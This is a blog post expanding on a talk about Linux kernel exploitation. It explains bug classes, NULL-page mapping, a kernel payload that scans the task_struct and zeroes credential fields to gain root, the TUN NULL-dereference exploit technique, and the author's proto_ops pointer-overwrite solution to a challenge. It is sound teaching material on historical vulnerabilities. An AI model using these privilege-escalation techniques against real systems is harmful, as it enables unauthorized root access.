Hello,

So, last Saturday, I gave a talk about Linux Kernel Exploitation.

I went over some well-known vulnerabilities and ended with a demo on a kernel exploitation challenge (here) by Jason Donenfeld (his site). The slides are at the end of this blog article.

In this post, I will go into a bit more detail on some of the slides from the talk.

I will not detail every single slide, only the ones where I think there aren’t enough details. If you don’t understand something, don’t hesitate to comment ;).

So, let’s dig in.

Linux Kernel

The kernel has LOTS of code.

15+ million lines of code.

LOTS of code means complexity, complexity means bugs and bugs mean potential vulnerabilities ;).

Anyhow, the main gateways for users to interact with the kernel are syscalls and IOCTLs.

Behind a syscall, especially the network ones, there is a TON of code.

For instance, for a bind() call, you have the same interface whatever the protocol, right?

Well, the kernel finds the corresponding structure using the socket descriptor you pass to your bind() call.

In that structure, there is what is called a struct proto_ops which contains callbacks for the corresponding protocol.
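
To make the dispatch idea concrete, here is a minimal userland sketch of a single bind() entry point that routes to protocol-specific code through a callback table. Every name in it (fake_proto_ops, fake_socket, fake_sys_bind, the return codes) is made up for the illustration; the real struct proto_ops has many more callbacks and the real lookup is far more involved.

```c
#include <stddef.h>

/* Hypothetical, reduced stand-ins for the kernel structures. */
struct fake_socket;

struct fake_proto_ops {
    int (*bind)(struct fake_socket *sock);   /* protocol-specific callback */
};

struct fake_socket {
    const struct fake_proto_ops *ops;
};

/* Arbitrary return codes, only there to tell the two handlers apart. */
enum { FAKE_INET_BIND = 1, FAKE_UNIX_BIND = 2 };

int fake_inet_bind(struct fake_socket *sock) { (void)sock; return FAKE_INET_BIND; }
int fake_unix_bind(struct fake_socket *sock) { (void)sock; return FAKE_UNIX_BIND; }

static const struct fake_proto_ops fake_inet_ops = { fake_inet_bind };
static const struct fake_proto_ops fake_unix_ops = { fake_unix_bind };

/* Toy descriptor table: descriptor 0 is an "inet" socket, 1 a "unix" one. */
static struct fake_socket fake_fd_table[2] = {
    { &fake_inet_ops },
    { &fake_unix_ops },
};

/* Same interface for every protocol: find the socket from the descriptor,
 * then call through the callback table attached to it. */
int fake_sys_bind(int fd)
{
    if (fd < 0 || fd >= 2)
        return -1;                           /* unknown descriptor */
    struct fake_socket *sock = &fake_fd_table[fd];
    return sock->ops->bind(sock);
}
```

The caller only ever sees fake_sys_bind(); which code actually runs depends on the table the socket points to. That is also why a corrupted callback pointer in such a table is an attractive target.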

Exploiting the Linux Kernel

The Linux Kernel is made of code, it is software. And everyone knows that software has bugs and vulnerabilities. The Linux Kernel is no exception.

You will mostly find all the vulnerabilities you know from userland:

  • stack based buffer overflows
  • heap based buffer overflows
  • race conditions
  • integer signedness issues
  • information leaks
  • initialisation issues
  • etc

And some different ones:

  • NULL Pointer Dereference
  • stack overflows (real ones: the kernel stack itself is exhausted, as opposed to stack based buffer overflows)
  • process manipulation tricks (mempodipper)
  • etc

__copy_to_user() and copy_to_user() are not the same.

The first one doesn’t check that the destination address actually lives in userland, while the second one does.
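
The difference can be sketched in userland with a toy memory model. Everything below is an assumption made for the illustration: the fake_ names, the flat fake_memory array and the FAKE_USER_LIMIT boundary are not kernel code, they only mimic the checked versus unchecked behaviour.

```c
#include <stdint.h>
#include <string.h>

/* Toy address space: offsets below FAKE_USER_LIMIT play the role of
 * userland, the rest plays the role of kernel memory. */
#define FAKE_USER_LIMIT 0x1000u

unsigned char fake_memory[0x2000];

/* Range check in the spirit of the kernel's access_ok(). */
int fake_access_ok(uint32_t addr, uint32_t len)
{
    return addr <= FAKE_USER_LIMIT && len <= FAKE_USER_LIMIT - addr;
}

/* Unchecked variant, like __copy_to_user(): trusts the caller.
 * Returns the number of bytes NOT copied (always 0 here). */
uint32_t fake_raw_copy_to_user(uint32_t to, const void *from, uint32_t len)
{
    memcpy(&fake_memory[to], from, len);
    return 0;
}

/* Checked variant, like copy_to_user(): refuses destinations that are
 * not entirely inside the "user" range. */
uint32_t fake_copy_to_user(uint32_t to, const void *from, uint32_t len)
{
    if (!fake_access_ok(to, len))
        return len;                 /* nothing copied */
    return fake_raw_copy_to_user(to, from, len);
}
```

If a code path uses the unchecked variant on a destination the user controls, the user chooses where the kernel writes: fake_raw_copy_to_user(0x1800, ...) happily overwrites "kernel" memory, while fake_copy_to_user() rejects the same call.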

The goal of exploiting the kernel is mainly to get root.

NULL Pointer Dereference

It was (is?) exploitable in the kernel simply because you could (can?) map the NULL page in your exploit, as that page lives in userland. As such, dereferencing NULL doesn’t crash: the kernel reads whatever you placed there.
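
Whether you still can is easy to test from userland. The sketch below simply asks mmap() for page zero with MAP_FIXED and reports whether the kernel agreed; try_map_null_page() is a name I made up. On current kernels the vm.mmap_min_addr sysctl normally makes this fail for unprivileged processes, so expect a 0 on most machines.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

/* Returns 1 if page zero could be mapped, 0 if the kernel refused. */
int try_map_null_page(void)
{
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0)
        return 0;

    /* MAP_FIXED asks for exactly address 0, not just a hint. */
    void *p = mmap((void *)0, (size_t)page, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    if (p == MAP_FAILED)
        return 0;

    /* Success: address 0 is now a valid, attacker-controlled page. */
    munmap(p, (size_t)page);
    return 1;
}
```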

Heuristics

These are routines that allow you to have good enough approximations.

For instance, before 2.6.29, credentials were stored like this in the kernel:

/*
Kernel 2.6.23
include/linux/sched.h
*/

struct task_struct {
/* ... */

/* process credentials */
    uid_t uid,euid,suid,fsuid;
    gid_t gid,egid,sgid,fsgid;
    struct group_info *group_info;
    kernel_cap_t   cap_effective, cap_inheritable, cap_permitted;
    unsigned keep_capabilities:1;
    struct user_struct *user;

/* ... */
};

As you can see, uid, euid and suid will generally have the same value. So if you set those values to 0, your process basically has root privileges. This heuristic is good enough as there is little chance that you will find 3 consecutive dwords with the same value in memory (don’t forget we start the search from our current task_struct, which represents our exploit process).

This routine before 2.6.29 was thus enough to get root:

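// get root before 2.6.29 kernel
// get_task_struct() is the exploit's own helper: it returns the address of
// the current task_struct, where the scan starts.
void get_root_pre_2_6_29 (void)
{
    uid_t uid, *cred;
    size_t i;

    uid = getuid();
    cred = get_task_struct();
    if (!cred)
        return;

    // cred advances one uid_t at a time, so the bound is expressed in
    // uid_t units to keep the scan within one page
    for (i = 0; i < PAGE_SIZE / sizeof(*cred); i++) {
        // uid, euid and suid are adjacent and normally all equal to our uid
        if (cred[0] == uid
                && cred[1] == uid
                && cred[2] == uid) {
            // uid, euid, suid, fsuid then gid, egid, sgid, fsgid
            cred[0] = cred[1] = cred[2] = cred[3] = 0;
            cred[4] = cred[5] = cred[6] = cred[7] = 0;
            break;  // patched, no need to keep scanning
        }
        cred++;
    }
}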
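
The same heuristic can be tried safely in userland on a fake structure. This is only a sketch: struct fake_task is a made-up, heavily reduced layout (the real task_struct has far more fields) and patch_ids() is a name I chose for the scan.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, heavily reduced task_struct: a few unrelated fields,
 * then the credentials in the same order as in 2.6.23. */
struct fake_task {
    uint32_t before[5];
    uint32_t uid, euid, suid, fsuid;
    uint32_t gid, egid, sgid, fsgid;
    uint32_t after[3];
};

/* Scan `words` dwords for three consecutive values equal to `uid`, then
 * zero the eight ids starting there. Returns the dword index that was
 * patched, or -1 if the pattern was not found. */
long patch_ids(uint32_t *mem, size_t words, uint32_t uid)
{
    for (size_t i = 0; i + 8 <= words; i++) {
        if (mem[i] == uid && mem[i + 1] == uid && mem[i + 2] == uid) {
            for (size_t j = 0; j < 8; j++)
                mem[i + j] = 0;
            return (long)i;
        }
    }
    return -1;
}
```

Filling a struct fake_task with uid 1000 everywhere and calling patch_ids((uint32_t *)&task, sizeof task / sizeof(uint32_t), 1000) zeroes the eight ids and leaves the surrounding fields untouched.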

Root in 3 big steps

You’ve basically got 3 big steps: prepare, trigger vulnerability, trigger payload.

Prepare

This is the most important step as this will greatly affect the reliability of your exploit.

This is where you:

  • check that the kernel is vulnerable.
  • use information leaks
  • prepare the memory layout so you can predict reliably where your objects are
  • place your shell code in memory

The advantage of shellcoding in the kernel: it is in C.

Trigger vulnerability

This is where you will exploit your vulnerability.

You patch memory, pointers and whatever else the bug lets you reach.

Trigger payload

This is where you escalate the privileges of your process.

This is also where you fix the mayhem you may have caused earlier. It is REALLY important to fix the things you messed up as otherwise the machine may crash later. It is done in the payload as the payload is executed in kernel mode. root is in userland, root != kernel land, don’t get confused about that.

After triggering the payload, you go back to userland and spawn your root shell or whatever else you need.

Ok, now that you have the basic understanding, you are ready for some kernel goodies.

Linux Kernel Exploitation

I won’t explain CVE-2009-2692 unless some people ask for it. It is simple enough to understand from the slides.

Anyhow, let’s dig into the TUN NULL Pointer Dereference.

TUN NULL Pointer Dereference

This vulnerability is really interesting as there is something special about it: the vulnerability is NOT visible in the source code as written. It is introduced at compilation. Basically, what happens is that tun is dereferenced (tun->sk) before checking that tun is NULL. GCC therefore considers that the pointer cannot be NULL, since we use it before checking, and removes the NULL check. Boom, vulnerability.

The vulnerable code:

static unsigned int tun_chr_poll(struct file *file, poll_table * wait)
{
    struct tun_file *tfile = file->private_data;
    struct tun_struct *tun = __tun_get(tfile);
    struct sock *sk = tun->sk;
    unsigned int mask = 0;

    if (!tun)
        return POLLERR;

    /* ... */

    if (sock_writeable(sk) ||
        (!test_and_set_bit(SOCK_ASYNC_NOSPACE, &sk->sk_socket->flags) &&
         sock_writeable(sk)))
        mask |= POLLOUT | POLLWRNORM;

    /* ... */

    return mask;
}

So the NULL check doesn’t exist and tun is NULL. We can therefore map the NULL page, and we thus control tun->sk. We control sk->sk_socket->flags as well. test_and_set_bit() sets the lowest bit to 1. Bang, we can set any NULL pointer to 1. In the exploit, the mmap() pointer is chosen, as the TUN device doesn’t have an mmap() handler. The mmap() pointer needs to be set to 1 even though we control the NULL page, because internally mmap() is not called if the pointer is NULL. Put a trampoline at address 1 to jump over all the junk you’ve set up and go to your payload. And that’s it, you’ve escalated your privileges.
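
Here is a small userland model of the "NULL pointer becomes 1" step. It is a sketch under assumptions: fake_test_and_set_bit() is a non-atomic stand-in for the kernel function, and the mmap slot is stored as an integer in a made-up fake_file_operations so the example never builds an invalid function pointer.

```c
/* Non-atomic stand-in for test_and_set_bit(): sets bit `nr` in *addr and
 * returns the previous value of that bit. */
int fake_test_and_set_bit(unsigned nr, unsigned long *addr)
{
    unsigned long mask = 1UL << nr;
    int old = (*addr & mask) != 0;
    *addr |= mask;
    return old;
}

/* Hypothetical, reduced file_operations with a single handler slot. */
struct fake_file_operations {
    unsigned long mmap;     /* 0 means "no mmap() handler" */
};

/* Models the exploit's trick: the attacker-controlled "flags" address is
 * made to alias the empty mmap slot, and bit 0 gets set on it. */
unsigned long flip_null_slot(void)
{
    struct fake_file_operations fops = { 0 };
    fake_test_and_set_bit(0, &fops.mmap);
    return fops.mmap;
}
```

flip_null_slot() returns 1: the slot is no longer NULL, and it now "points" to address 1, which sits inside the page the attacker has mapped.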

Why mmap() can’t be NULL?

If you dig around in the kernel, here is what to look for:

// arch/x86/kernel/sys_x86_64.c
asmlinkage long sys_mmap(unsigned long addr, unsigned long len,
        unsigned long prot, unsigned long flags,
        unsigned long fd, unsigned long off)
{
    long error;
    struct file *file;

    error = -EINVAL;
    if (off & ~PAGE_MASK)
        goto out;

    error = -EBADF;
    file = NULL;
    flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE);
    if (!(flags & MAP_ANONYMOUS)) {
        file = fget(fd);
        if (!file)
            goto out;
    }
    down_write(&current->mm->mmap_sem);
    error = do_mmap_pgoff(file, addr, len, prot, flags, off >> PAGE_SHIFT);
    up_write(&current->mm->mmap_sem);

    if (file)
        fput(file);
out:
    return error;
}

If you follow do_mmap_pgoff() down, you end up finding this code:

// mm/mmap.c

/* ... */ 

            if (!file->f_op || !file->f_op->mmap)
                return -ENODEV;
            break;

/* ... */

So here it is: if mmap() is NULL, it doesn’t get called. That is why the exploit sets the mmap() pointer to 1.
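
The check is easy to reproduce in isolation. The sketch below mirrors only the two-part test quoted above; fake_file, fake_file_operations, fake_do_mmap() and fake_handler() are made-up names, and the real do_mmap_pgoff() obviously does much more.

```c
#include <errno.h>
#include <stddef.h>

struct fake_file;

/* Hypothetical, reduced file_operations with a single handler. */
struct fake_file_operations {
    int (*mmap)(struct fake_file *file);
};

struct fake_file {
    const struct fake_file_operations *f_op;
};

/* Dummy handler standing in for a driver's mmap() implementation. */
int fake_handler(struct fake_file *file)
{
    (void)file;
    return 0;
}

/* Same guard as the kernel snippet: a missing table or a NULL handler
 * means the call is refused before any pointer is followed. */
int fake_do_mmap(struct fake_file *file)
{
    if (!file->f_op || !file->f_op->mmap)
        return -ENODEV;
    return file->f_op->mmap(file);
}
```

With a NULL handler the function returns -ENODEV and nothing is called. Any non-NULL value, including 1, passes the guard and gets called.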

Other exploits

This is where it gets pretty hard to explain as there is still tons of code to read x). I dug a bit into the vmsplice, RDS and perf_events exploits.

The vmsplice exploit uses a buffer overflow, but not a common one, as it doesn’t overwrite any function or return pointers. What it overwrites are compound page addresses (values we don’t control), and the kernel then calls a dtor pointer that the attacker controls. Privileged code execution is gained in put_compound_page() through the call of a destructor function pointer that we control. This dtor pointer obviously points to the attacker’s payload. At the end of the article, I’ve attached some analysis I did for vmsplice. There is a lot of code to cover though, so I won’t detail it in this post.

I haven’t thoroughly analyzed the RDS exploit yet but it is a write-what-where.

The perf_events exploit is really interesting. It ‘basically’ increments the upper bytes of a 64-bit INT handler pointer so that the pointer ends up in userland. The exploit then returns to this allocated memory containing the payload. The exploit also uses a neat trick to compute the perf_event array. An entire post would be necessary to properly understand this exploit. Analyses have already been done by other people anyhow.
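
The arithmetic behind the "upper bytes" trick fits in a few lines. This is a simplified model, not the exploit: I assume the increment hits the upper 32 bits of the handler address as one unit, and the sample address in the note is invented.

```c
#include <stdint.h>

/* Increment the upper 32 bits of a 64-bit address, leaving the lower 32
 * bits alone. For a kernel text address the upper half is 0xffffffff,
 * which wraps around to 0. */
uint64_t bump_high_dword(uint64_t handler)
{
    uint32_t high = (uint32_t)(handler >> 32);
    uint32_t low = (uint32_t)handler;

    high += 1;                      /* unsigned wrap: 0xffffffff + 1 == 0 */
    return ((uint64_t)high << 32) | low;
}
```

With the made-up handler address 0xffffffff81234567, the result is 0x0000000081234567: same low half, but now an address that userland can mmap() and fill with a payload.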

The challenge

The VM is a 64-bit Linux system made especially by Jason Donenfeld (aka zx2c4). The vulnerability allows us to write a 0 anywhere in kernel memory. As such, in my exploit, I zeroed out part of a proto_ops function pointer so that it points into userland. I then mmap() that address, put my payload there, jump to it and fix the pointer afterwards.

I debugged the exploit using the register information shown when the exploit crashed.
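
To show why zeroing part of a pointer is enough, here is a sketch of the arithmetic. The pointer value, the offset and the width of the zero write are assumptions for the illustration (the real ones depend on the challenge), and the userland limit assumes x86_64 with 47-bit user addresses.

```c
#include <stdint.h>

/* Zero `len` bytes of a 64-bit value starting at byte `off` (byte 0 is
 * the least significant one, as stored in little-endian memory). */
uint64_t zero_bytes(uint64_t value, unsigned off, unsigned len)
{
    for (unsigned i = off; i < off + len && i < 8; i++)
        value &= ~(0xffULL << (8 * i));
    return value;
}

/* On x86_64 with 47-bit user addresses, userland lives in the lower
 * half of the address space. */
int is_user_address(uint64_t addr)
{
    return addr < 0x0000800000000000ULL;
}
```

Taking the invented kernel pointer 0xffffffff81234567 and zeroing its four upper bytes gives 0x0000000081234567, which is_user_address() accepts. The kernel will still call through that pointer, but the target is now memory the exploit owns.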

The exploit is included in the archive below.

Conclusion

As you can see, kernel exploitation has some similarities with userland exploitation. The differences mainly stem from the protections and the impact that a bug can have. For instance, in kernel-land, not initializing a structure fully can have severe consequences (code execution through NULL pointer dereference, etc) while in userland, it may cause an infoleak but not directly code execution.

Moreover, this also shows that the kernel is a piece of software and is as such exploitable.

Hope you enjoyed the article,

I welcome any feedback on it,

Cheers,

m_101

Resources